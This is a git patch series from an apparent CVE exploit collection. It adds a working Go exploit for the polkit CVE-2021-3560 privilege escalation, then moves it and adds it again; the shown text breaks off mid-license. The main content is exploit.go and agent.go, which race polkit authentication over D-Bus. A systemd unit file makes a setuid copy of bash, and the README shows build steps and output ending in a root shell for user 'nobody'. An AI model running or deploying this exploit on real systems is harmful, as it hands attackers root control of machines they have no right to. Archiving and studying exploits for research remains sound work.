From b4ea8c76c0b6bfe6deb2666cc8ee90d51f8ec879 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:25:30 +0000 Subject: [PATCH 1/9] =?UTF-8?q?=E6=96=B0=E5=BB=BA=20CVE-2021-3560?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2021/CVE-2021-3560/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) create mode 100644 cve/apache/2021/CVE-2021-3560/.keep diff --git a/cve/apache/2021/CVE-2021-3560/.keep b/cve/apache/2021/CVE-2021-3560/.keep new file mode 100644 index 00000000..e69de29b -- Gitee From 1cbc4b78526973deb24ab13f26d80fc0defc61ff Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:27:57 +0000 Subject: [PATCH 2/9] add cve-2021-3560 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- .../LICENSE | 190 ++++++++++++++++++ .../README.md | 40 ++++ .../agent.go | 96 +++++++++ .../exploit.go | 156 ++++++++++++++ .../go.mod | 5 + .../go.sum | 3 + .../pwnkit.service | 9 + 7 files changed, 499 insertions(+) create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/LICENSE create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/README.md create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/agent.go create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/exploit.go create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.mod create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.sum create mode 100644 cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/pwnkit.service diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/LICENSE b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/LICENSE new file mode 100644 index 00000000..d1828ea2 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/LICENSE @@ -0,0 +1,190 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + (except as stated in this section) patent license to make, have made, + use, offer to sell, sell, import, and otherwise transfer the Work, + where such license applies only to those patent claims licensable + by such Contributor that are necessarily infringed by their + Contribution(s) alone or by combination of their Contribution(s) + with the Work to which such Contribution(s) was submitted. If You + institute patent litigation against any entity (including a + cross-claim or counterclaim in a lawsuit) alleging that the Work + or a Contribution incorporated within the Work constitutes direct + or contributory patent infringement, then any patent licenses + granted to You under this License for that Work shall terminate + as of the date such litigation is filed. + + 4. Redistribution. You may reproduce and distribute copies of the + Work or Derivative Works thereof in any medium, with or without + modifications, and in Source or Object form, provided that You + meet the following conditions: + + (a) You must give any other recipients of the Work or + Derivative Works a copy of this License; and + + (b) You must cause any modified files to carry prominent notices + stating that You changed the files; and + + (c) You must retain, in the Source form of any Derivative Works + that You distribute, all copyright, patent, trademark, and + attribution notices from the Source form of the Work, + excluding those notices that do not pertain to any part of + the Derivative Works; and + + (d) If the Work includes a "NOTICE" text file as part of its + distribution, then any Derivative Works that You distribute must + include a readable copy of the attribution notices contained + within such NOTICE file, excluding those notices that do not + pertain to any part of the Derivative Works, in at least one + of the following places: within a NOTICE text file distributed + as part of the Derivative Works; within the Source form or + documentation, if provided along with the Derivative Works; or, + within a display generated by the Derivative Works, if and + wherever such third-party notices normally appear. The contents + of the NOTICE file are for informational purposes only and + do not modify the License. You may add Your own attribution + notices within Derivative Works that You distribute, alongside + or as an addendum to the NOTICE text from the Work, provided + that such additional attribution notices cannot be construed + as modifying the License. + + You may add Your own copyright statement to Your modifications and + may provide additional or different license terms and conditions + for use, reproduction, or distribution of Your modifications, or + for any such Derivative Works as a whole, provided Your use, + reproduction, and distribution of the Work otherwise complies with + the conditions stated in this License. + + 5. Submission of Contributions. Unless You explicitly state otherwise, + any Contribution intentionally submitted for inclusion in the Work + by You to the Licensor shall be under the terms and conditions of + this License, without any additional terms or conditions. + Notwithstanding the above, nothing herein shall supersede or modify + the terms of any separate license agreement you may have executed + with Licensor regarding such Contributions. + + 6. Trademarks. This License does not grant permission to use the trade + names, trademarks, service marks, or product names of the Licensor, + except as required for reasonable and customary use in describing the + origin of the Work and reproducing the content of the NOTICE file. + + 7. Disclaimer of Warranty. Unless required by applicable law or + agreed to in writing, Licensor provides the Work (and each + Contributor provides its Contributions) on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or + implied, including, without limitation, any warranties or conditions + of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A + PARTICULAR PURPOSE. You are solely responsible for determining the + appropriateness of using or redistributing the Work and assume any + risks associated with Your exercise of permissions under this License. + + 8. Limitation of Liability. In no event and under no legal theory, + whether in tort (including negligence), contract, or otherwise, + unless required by applicable law (such as deliberate and grossly + negligent acts) or agreed to in writing, shall any Contributor be + liable to You for damages, including any direct, indirect, special, + incidental, or consequential damages of any character arising as a + result of this License or out of the use or inability to use the + Work (including but not limited to damages for loss of goodwill, + work stoppage, computer failure or malfunction, or any and all + other commercial damages or losses), even if such Contributor + has been advised of the possibility of such damages. + + 9. Accepting Warranty or Additional Liability. While redistributing + the Work or Derivative Works thereof, You may choose to offer, + and charge a fee for, acceptance of support, warranty, indemnity, + or other liability obligations and/or rights consistent with this + License. However, in accepting such obligations, You may act only + on Your own behalf and on Your sole responsibility, not on behalf + of any other Contributor, and only if You agree to indemnify, + defend, and hold each Contributor harmless for any liability + incurred by, or claims asserted against, such Contributor by reason + of your accepting any such warranty or additional liability. + + END OF TERMS AND CONDITIONS + + Copyright 2022 Ricter Zheng + + Licensed under the Apache License, Version 2.0 (the "License"); + you may not use this file except in compliance with the License. + You may obtain a copy of the License at + + http://www.apache.org/licenses/LICENSE-2.0 + + Unless required by applicable law or agreed to in writing, software + distributed under the License is distributed on an "AS IS" BASIS, + WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + See the License for the specific language governing permissions and + limitations under the License. diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/README.md b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/README.md new file mode 100644 index 00000000..1f2111d1 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/README.md @@ -0,0 +1,40 @@ +PolicyKit CVE-2021-3560 Exploit (Authentication Agent) +==== + +### Technology Details +Blog posts about this exploit : +- https://ricterz.me/posts/2022-04-28-a-new-exploit-method-for-cve-2021-3560-polkit-linux-privilege-escalation.txt +- http://noahblog.360.cn/a-new-exploit-method-for-cve-2021-3560-policykit-linux-privilege-escalation + +## Build & Usage +``` +nobody@test:/tmp/CVE-2021-3560$ go build +nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service +=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === +pid-267920 - [*] Registering PolicyKit authentication agent ... +... +pid-267915 - [-] Exploit failed, please try again +nobody@test:/tmp/CVE-2021-3560$ ./CVE-2021-3560 ./pwnkit.service +=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab === +pid-267963 - [*] Registering PolicyKit authentication agent ... +pid-267963 - [*] Authentication agent main loop running ... +pid-267968 - [*] Registering PolicyKit authentication agent ... +pid-267973 - [*] Registering PolicyKit authentication agent ... +pid-267968 - [*] Authentication agent main loop running ... +pid-267973 - [*] Authentication agent main loop running ... +pid-267963 - [*] Starting systemd service 'pwnkit.service' ... +pid-267968 - [*] Enabling systemd unit file '/tmp/pwnkit.service' ... +pid-267973 - [*] Reloading systemd daemon ... +pid-267963 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-units' +pid-267963 - [*] Cookie: 100-9b8357901e7f4f4847cbd15a3d191cc4-1-10167c9df23ebe27c57534750f48ef7a +pid-267968 - [+] Received authentication request for action: 'org.freedesktop.systemd1.manage-unit-files' +pid-267968 - [*] Cookie: 101-48273279f75230e86c9ad5df212ee54d-1-a86a81adcf07ad16ab6017a21235da80 +pid-267973 - [+] Received authentication request for action: 'org.freedesktop.systemd1.reload-daemon' +pid-267973 - [*] Cookie: 102-3fb9b174b470f5d04881cbfeb16a60d0-1-8a36d3a7f9aca22af0a0f8562f20dbe2 +pid-267958 - [+] File exists, popping root shell ... +pwned-5.0# id +uid=65534(nobody) gid=65534(nogroup) euid=0(root) egid=0(root) groups=0(root),65534(nogroup) +``` + +## License +Apache License diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/agent.go b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/agent.go new file mode 100644 index 00000000..c8fd629d --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/agent.go @@ -0,0 +1,96 @@ +package main + +import ( + "fmt" + "os" + "strconv" + "syscall" + "time" + + "github.com/godbus/dbus/v5" +) + +var PolicyKitName = "org.freedesktop.PolicyKit1" +var PolicyKitInterface = "org.freedesktop.PolicyKit1.Authority" +var PolicyKitObjectPath = "/org/freedesktop/PolicyKit1/Authority" +var PolicyKitAgentInterface = "org.freedesktop.PolicyKit1.AuthenticationAgent" +var PolicyKitAgentObjectPath = "/org/freedesktop/PolicyKit1/AuthenticationAgent" + +type Subject struct { + Type string `dbus:"s"` + Data map[string]dbus.Variant `dbus:"a{sv}"` +} + +type Identity struct { + Type string `dbus:"s"` + Data map[string]dbus.Variant `dbus:"a{sv}"` +} + +type Agent struct { + Conn *dbus.Conn + Authority *dbus.BusObject + Subject *Subject +} + +func Logging(format string, a ...interface{}) { + format = "pid-" + strconv.Itoa(os.Getpid()) + " - " + format + "\n" + fmt.Printf(format, a ...) +} + +func (agent Agent) RegisterAgent() { + Logging("[*] Registering PolicyKit authentication agent ...") + + call := (*agent.Authority).Call(PolicyKitInterface+".RegisterAuthenticationAgent", 0, + agent.Subject, "en_US.UTF-8", PolicyKitAgentObjectPath) + + if call.Err != nil { + Logging("[-] Error while registering authentication agent: %s", call.Err) + os.Exit(2) + } +} + +func Kill(pid int) { + time.Sleep(time.Millisecond * 10) + syscall.Kill(pid, syscall.SIGKILL) +} + +func (agent Agent) BeginAuthentication(action string, _ string, _ string, _ map[string]string, + cookie string, identities []Identity) *dbus.Error { + Logging("[+] Received authentication request for action: '%s'", action) + Logging("[*] Cookie: %s", cookie) + + go Kill(os.Getpid()) + go (*agent.Authority).Call(PolicyKitInterface+".AuthenticationAgentResponse2", 0, + uint32(os.Getuid()), cookie, identities[0]) + time.Sleep(time.Millisecond * 1) + return nil +} + +func (agent Agent) StartAgent() { + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + // setup + agent.Conn = conn + agent.Subject = new(Subject) + agent.Subject.Type = "unix-process" + + agent.Subject.Data = make(map[string]dbus.Variant) + agent.Subject.Data["pid"] = dbus.MakeVariant(uint32(os.Getpid())) + agent.Subject.Data["start-time"] = dbus.MakeVariant(uint64(0)) + + // set authority + obj := agent.Conn.Object(PolicyKitName, dbus.ObjectPath(PolicyKitObjectPath)) + agent.Authority = &obj + + // export methods + mapping := make(map[string]string) + mapping["BeginAuthentication"] = "BeginAuthentication" + agent.Conn.ExportWithMap(agent, mapping, dbus.ObjectPath(PolicyKitAgentObjectPath), PolicyKitAgentInterface) + agent.RegisterAgent() + + Logging("[*] Authentication agent main loop running ...") +} diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/exploit.go b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/exploit.go new file mode 100644 index 00000000..74e80c0f --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/exploit.go @@ -0,0 +1,156 @@ +package main + +import ( + "fmt" + "os" + "os/exec" + "path/filepath" + "strings" + "syscall" + "time" + + "github.com/godbus/dbus/v5" +) + +var SystemdName = "org.freedesktop.systemd1" +var SystemdInterface = "org.freedesktop.systemd1.Manager" +var SystemdObjectPath = "/org/freedesktop/systemd1" + + +func Banner() { + fmt.Println("=== polkit CVE-2021-3560 exploit - RicterZ @ 360 Noah Lab ===") +} + +func Fork() { + attr := &syscall.ProcAttr{ + Env: os.Environ(), + Files: []uintptr{os.Stdin.Fd(), os.Stdout.Fd(), os.Stderr.Fd()}, + } + args := append(os.Args, "1") + go syscall.ForkExec("/proc/self/exe", args, attr) +} + +func main() { + if len(os.Args) == 2 { + Banner() + } + if !strings.HasSuffix(os.Args[1], ".service") { + Logging("[-] Unit file must end with .service") + os.Exit(3) + } + + abs, err := filepath.Abs(os.Args[1]) + if err != nil { + Logging("[-] Unit file status error: %s", err) + os.Exit(3) + } + + if len(os.Args) <= 4 { + Fork() + } + + var agent Agent + + if len(os.Args) != 2 { + go agent.StartAgent() + time.Sleep(time.Millisecond * 500) + } + + if len(os.Args) == 3 { + go MethodCallStartService(filepath.Base(abs)) + } else if len(os.Args) == 4 { + go MethodCallEnableUnitFiles(abs) + } else if len(os.Args) == 5 { + go MethodReload() + } else { + for i:=1; i<5; i++ { + time.Sleep(time.Second) + if _, err := os.Stat("/usr/local/bin/pwned"); err == nil { + Logging("[+] File exists, popping root shell ...") + cmd := exec.Command("/usr/local/bin/pwned", "-p") + cmd.Stdin = os.Stdin + cmd.Stdout = os.Stdout + cmd.Stderr = os.Stderr + cmd.Run() + os.Exit(0) + } + } + Logging("[-] Exploit failed, please try again") + os.Exit(1) + } + + select {} +} + + +func MethodCallStartService(ServiceName string) { + Logging("[*] Starting systemd service '%s' ...", ServiceName) + conn, err := dbus.ConnectSystemBus() + defer conn.Close() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + call := bus.Call(SystemdInterface+".StartUnit", 4, ServiceName, "replace") + if call.Err != nil { + Logging("[-] Error for starting systemd service: %s", call.Err) + } +} + +func MethodReload() { + Logging("[*] Reloading systemd daemon ...") + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connecting system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + message := CreateMessage(bus, SystemdInterface+".Reload") + call := conn.Send(message, make(chan *dbus.Call, 1)) + if call.Err != nil { + Logging("[-] Error for reloading daemon: %s", call.Err) + } +} + +func MethodCallEnableUnitFiles(ServiceName string) { + Logging("[*] Enabling systemd unit file '%s' ...", ServiceName) + conn, err := dbus.ConnectSystemBus() + if err != nil { + Logging("[-] Error for connection system bus: %s", err) + os.Exit(1) + } + + bus := conn.Object(SystemdName, dbus.ObjectPath(SystemdObjectPath)) + message := CreateMessage(bus, SystemdInterface+".EnableUnitFiles", []string{ServiceName}, false, true) + call := conn.Send(message, make(chan *dbus.Call, 1)) + if call.Err != nil { + Logging("[-] Error for enabling unit file: %s", call.Err) + } +} + +func CreateMessage(obj dbus.BusObject, method string, args ...interface{}) *dbus.Message { + iface := "" + i := strings.LastIndex(method, ".") + if i != -1 { + iface = method[:i] + } + method = method[i+1:] + msg := new(dbus.Message) + msg.Type = dbus.TypeMethodCall + msg.Flags = dbus.FlagAllowInteractiveAuthorization + msg.Headers = make(map[dbus.HeaderField]dbus.Variant) + msg.Headers[dbus.FieldPath] = dbus.MakeVariant(obj.Path()) + msg.Headers[dbus.FieldDestination] = dbus.MakeVariant(obj.Destination()) + msg.Headers[dbus.FieldMember] = dbus.MakeVariant(method) + if iface != "" { + msg.Headers[dbus.FieldInterface] = dbus.MakeVariant(iface) + } + msg.Body = args + if len(args) > 0 { + msg.Headers[dbus.FieldSignature] = dbus.MakeVariant(dbus.SignatureOf(args...)) + } + return msg +} diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.mod b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.mod new file mode 100644 index 00000000..9e06b1f1 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.mod @@ -0,0 +1,5 @@ +module CVE-2021-3560 + +go 1.13 + +require github.com/godbus/dbus/v5 v5.1.0 diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.sum b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.sum new file mode 100644 index 00000000..7538a956 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.sum @@ -0,0 +1,3 @@ +github.com/godbus/dbus v4.1.0+incompatible h1:WqqLRTsQic3apZUK9qC5sGNfXthmPXzUZ7nQPrNITa4= +github.com/godbus/dbus/v5 v5.1.0 h1:4KLkAxT3aOY8Li4FRJe/KvhoNFFxo0m6fNuFUO8QJUk= +github.com/godbus/dbus/v5 v5.1.0/go.mod h1:xhWf0FNVPg57R7Z0UbKHbJfkEywrmjJnf7w5xrFpKfA= diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/pwnkit.service b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/pwnkit.service new file mode 100644 index 00000000..76435650 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/pwnkit.service @@ -0,0 +1,9 @@ +[Unit] +Description=Super Secure Shell +AllowIsolate=no + +[Service] +ExecStart=/bin/bash -c '/usr/bin/cp /bin/bash /usr/local/bin/pwned; /usr/bin/chmod +s /usr/local/bin/pwned' + +[Install] +Alias=pwnkit.service -- Gitee From 18a18b30bfafdc2bd6151b65902fb2dfc5c97621 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:28:07 +0000 Subject: [PATCH 3/9] =?UTF-8?q?=E5=88=A0=E9=99=A4=E6=96=87=E4=BB=B6=20cve/?= =?UTF-8?q?apache/2021/CVE-2021-3560/.keep?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cve/apache/2021/CVE-2021-3560/.keep | 0 1 file changed, 0 insertions(+), 0 deletions(-) delete mode 100644 cve/apache/2021/CVE-2021-3560/.keep diff --git a/cve/apache/2021/CVE-2021-3560/.keep b/cve/apache/2021/CVE-2021-3560/.keep deleted file mode 100644 index e69de29b..00000000 -- Gitee From f56e9be01e596788f2444a5d822cb311318f58fa Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:29:12 +0000 Subject: [PATCH 4/9] =?UTF-8?q?=E9=87=8D=E5=91=BD=E5=90=8D=20cve/apache/20?= =?UTF-8?q?21/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main=20?= =?UTF-8?q?=E4=B8=BA=20cve/apache/2021/CVE-2021-3560/CVE-2021-35601?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- .../LICENSE | 0 .../README.md | 0 .../agent.go | 0 .../exploit.go | 0 .../go.mod | 0 .../go.sum | 0 .../pwnkit.service | 0 7 files changed, 0 insertions(+), 0 deletions(-) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/LICENSE (100%) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/README.md (100%) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/agent.go (100%) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/exploit.go (100%) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/go.mod (100%) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/go.sum (100%) rename cve/apache/2021/CVE-2021-3560/{CVE-2021-3560-Authentication-Agent-main => CVE-2021-35601}/pwnkit.service (100%) diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/LICENSE b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/LICENSE similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/LICENSE rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/LICENSE diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/README.md b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/README.md similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/README.md rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/README.md diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/agent.go b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/agent.go similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/agent.go rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/agent.go diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/exploit.go b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/exploit.go similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/exploit.go rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/exploit.go diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.mod b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.mod similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.mod rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.mod diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.sum b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.sum similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/go.sum rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/go.sum diff --git a/cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/pwnkit.service b/cve/apache/2021/CVE-2021-3560/CVE-2021-35601/pwnkit.service similarity index 100% rename from cve/apache/2021/CVE-2021-3560/CVE-2021-3560-Authentication-Agent-main/pwnkit.service rename to cve/apache/2021/CVE-2021-3560/CVE-2021-35601/pwnkit.service -- Gitee From 40ad1eecb0cafdae86e1b9058239d71aaa376d87 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E7=8E=8B=E7=83=81=E6=9E=97?= <17377137@buaa.edu.cn> Date: Mon, 20 Mar 2023 13:29:56 +0000 Subject: [PATCH 5/9] add cve-2021-3560 MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Signed-off-by: 王烁林 <17377137@buaa.edu.cn> --- .../LICENSE | 190 ++++++++++++++++++ .../README.md | 40 ++++ .../agent.go | 96 +++++++++ .../exploit.go | 156 ++++++++++++++ .../go.mod | 5 + .../go.sum | 3 + .../pwnkit.service | 9 + 7 files changed, 499 insertions(+) create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/LICENSE create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/README.md create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/agent.go create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/exploit.go create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.mod create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/go.sum create mode 100644 cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/pwnkit.service diff --git a/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/LICENSE b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/LICENSE new file mode 100644 index 00000000..d1828ea2 --- /dev/null +++ b/cve/apache/2021/CVE-2021-3560-Authentication-Agent-main/LICENSE @@ -0,0 +1,190 @@ + Apache License + Version 2.0, January 2004 + http://www.apache.org/licenses/ + + TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION + + 1. Definitions. + + "License" shall mean the terms and conditions for use, reproduction, + and distribution as defined by Sections 1 through 9 of this document. + + "Licensor" shall mean the copyright owner or entity authorized by + the copyright owner that is granting the License. + + "Legal Entity" shall mean the union of the acting entity and all + other entities that control, are controlled by, or are under common + control with that entity. For the purposes of this definition, + "control" means (i) the power, direct or indirect, to cause the + direction or management of such entity, whether by contract or + otherwise, or (ii) ownership of fifty percent (50%) or more of the + outstanding shares, or (iii) beneficial ownership of such entity. + + "You" (or "Your") shall mean an individual or Legal Entity + exercising permissions granted by this License. + + "Source" form shall mean the preferred form for making modifications, + including but not limited to software source code, documentation + source, and configuration files. + + "Object" form shall mean any form resulting from mechanical + transformation or translation of a Source form, including but + not limited to compiled object code, generated documentation, + and conversions to other media types. + + "Work" shall mean the work of authorship, whether in Source or + Object form, made available under the License, as indicated by a + copyright notice that is included in or attached to the work + (an example is provided in the Appendix below). + + "Derivative Works" shall mean any work, whether in Source or Object + form, that is based on (or derived from) the Work and for which the + editorial revisions, annotations, elaborations, or other modifications + represent, as a whole, an original work of authorship. For the purposes + of this License, Derivative Works shall not include works that remain + separable from, or merely link (or bind by name) to the interfaces of, + the Work and Derivative Works thereof. + + "Contribution" shall mean any work of authorship, including + the original version of the Work and any modifications or additions + to that Work or Derivative Works thereof, that is intentionally + submitted to Licensor for inclusion in the Work by the copyright owner + or by an individual or Legal Entity authorized to submit on behalf of + the copyright owner. For the purposes of this definition, "submitted" + means any form of electronic, verbal, or written communication sent + to the Licensor or its representatives, including but not limited to + communication on electronic mailing lists, source code control systems, + and issue tracking systems that are managed by, or on behalf of, the + Licensor for the purpose of discussing and improving the Work, but + excluding communication that is conspicuously marked or otherwise + designated in writing by the copyright owner as "Not a Contribution." + + "Contributor" shall mean Licensor and any individual or Legal Entity + on behalf of whom a Contribution has been received by Licensor and + subsequently incorporated within the Work. + + 2. Grant of Copyright License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, no-charge, royalty-free, irrevocable + copyright license to reproduce, prepare Derivative Works of, + publicly display, publicly perform, sublicense, and distribute the + Work and such Derivative Works in Source or Object form. + + 3. Grant of Patent License. Subject to the terms and conditions of + this License, each Contributor hereby grants to You a perpetual, + worldwide, non-exclusive, 